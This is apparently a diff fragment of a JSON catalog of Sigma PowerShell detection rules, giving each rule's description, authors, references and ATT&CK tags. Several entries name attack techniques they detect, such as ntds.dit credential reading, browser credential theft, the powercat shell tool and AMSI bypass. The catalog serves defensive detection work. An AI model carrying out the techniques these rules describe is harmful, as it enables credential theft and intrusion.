+ "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pm_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + 
"attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module" + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "meta": { + "author": "ok @securonix invrep_de, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + ], + "filename": "posh_pm_bad_opsec_artifacts.yml", + "level": "critical", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_pm_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module" + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_decompress_commands.yml", + "level": "informational", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands" + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_addbaccount.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage" + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_clipboard.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" + }, + { + 
"description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", 
+ "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + 
], + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_powercat.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pm_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)" + }, + { + "description": "Adversaries may attempt 
to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.t1218" + ] + }, + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pm_susp_download.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - PowerShell Module" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + 
"falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_pm_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information" + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/21", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + 
"falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + 
"https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "meta": { + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "creation_date": "2020/10/06", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "filename": "posh_ps_accessing_win_api.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ] + }, + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing WinAPI in PowerShell" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_access_to_browser_login_data.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data" + }, + { + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "meta": { + "author": "Borna Talebi", + "creation_date": "2021/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_add_dnsclient_rule.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule" + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_adrecon_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution" + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType" + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "meta": { + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_apt_silence_eda.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + 